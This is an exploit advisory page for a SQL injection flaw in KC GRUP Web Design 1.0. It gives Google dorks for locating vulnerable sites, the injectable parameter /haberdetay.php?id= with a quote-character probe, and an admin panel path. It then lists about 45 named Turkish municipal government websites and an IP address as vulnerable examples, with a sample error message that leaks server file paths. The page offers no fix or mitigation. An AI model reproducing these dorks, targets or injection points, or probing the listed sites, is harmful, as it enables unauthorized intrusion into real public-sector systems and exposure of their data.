KC GRUP Web Design 1.0 SQL Injection

2018.12.05
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################################################# # Exploit Title : KC GRUP Web Design 1.0 SQL Injection # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 03/12/2018 # Vendor Homepage : kcgrup.com ~ kcgrupsms.com # Software Download Link : N/A # Tested On : Windows and Linux # Category : WebApps # Version Information : 1.0 # Exploit Risk : Medium # Google Dorks : intext:''Copyright A(c) 2014-2018 Belediye - TA1/4m haklarA+- saklA+-dA+-r. - Design by KC GRUP'' intext:Design by KC GRUP - Belediye Sitesi site:bel.tr inurl:''/haberdetay.php?id='' intext:Design by KC GRUP'' site:bel.tr # Exploit4Arab Exploit Link : exploit4arab.org/exploits/2260 # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Admin Panel Login Path : panel.kcgrupsms.com ################################################################################################# # SQL Injection Exploit : /haberdetay.php?id=[SQL Injection] ################################################################################################# # Example Vulnerable Sites => Turkish Government Official Municipality WebSites are vulnerable for this security issue. 85.95.249.117 IP Address is vulnerable. [+] guce.bel.tr/haberdetay.php?id=86%27 [+] kofcaz.bel.tr/haberdetay.php?id=86%27 [+] solhan.bel.tr/haberdetay.php?id=86%27 [+] tutak.bel.tr/haberdetay.php?id=86%27 [+] adakli.bel.tr/haberdetay.php?id=86%27 [+] meric.bel.tr/haberdetay.php?id=86%27 [+] karssusuz.bel.tr/haberdetay.php?id=86%27 [+] konuklar.bel.tr/haberdetay.php?id=86%27 [+] mazgirt.bel.tr/haberdetay.php?id=86%27 [+] kofcaz.bel.tr/haberdetay.php?id=86%27 [+] karliova.bel.tr/haberdetay.php?id=86%27 [+] saphane.bel.tr/haberdetay.php?id=86%27 [+] adakli.bel.tr/haberdetay.php?id=86%27 [+] kavakli.bel.tr/haberdetay.php?id=86%27 [+] balikoy.bel.tr/haberdetay.php?id=86%27 [+] duzici.bel.tr/haberdetay.php?id=86%27 [+] pazarlar.bel.tr/haberdetay.php?id=86%27 [+] yozgatdogankent.bel.tr/haberdetay.php?id=86%27 [+] corumortakoy.bel.tr/haberdetay.php?id=86%27 [+] cakirhuyuk.bel.tr/haberdetay.php?id=86%27 [+] deredolu.bel.tr/haberdetay.php?id=86%27 [+] gelendost.bel.tr/haberdetay.php?id=86%27 [+] sutculer.bel.tr/haberdetay.php?id=86%27 [+] akharim.bel.tr/haberdetay.php?id=86%27 [+] kazanci.bel.tr/haberdetay.php?id=86%27 [+] cakirhuyuk.bel.tr/haberdetay.php?id=86%27 [+] halfeli.bel.tr/haberdetay.php?id=86%27 [+] kovanlik.bel.tr/haberdetay.php?id=86%27 [+] sultanhani.bel.tr/haberdetay.php?id=86%27 [+] sambayat.bel.tr/haberdetay.php?id=86%27 [+] meric.bel.tr/haberdetay.php?id=86%27 [+] cimitekke.bel.tr/haberdetay.php?id=86%27 [+] uludere.bel.tr/haberdetay.php?id=86%27 [+] demirkoy.bel.tr/haberdetay.php?id=86%27 [+] bereketli.bel.tr/haberdetay.php?id=86%27 [+] uzgorur.bel.tr/haberdetay.php?id=86%27 [+] akpazar.bel.tr/haberdetay.php?id=86%27 [+] ardanuc.bel.tr/haberdetay.php?id=86%27 [+] guneyyurt.bel.tr/haberdetay.php?id=86%27 [+] olukozu.bel.tr/haberdetay.php?id=86%27 [+] buyukkalecik.bel.tr/haberdetay.php?id=86%27 [+] altinbasak.bel.tr/haberdetay.php?id=86%27 [+] hatipli.bel.tr/haberdetay.php?id=86%27 [+] cakirhuyuk.bel.tr/haberdetay.php?id=86%27 ################################################################################################# # Example SQL Database Error : Warning: Cannot modify header information - headers already sent by (output started at /home/guce/ public_html/baglan.php:7) in /home/guce/public_html/haberdetay.php on line 101 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top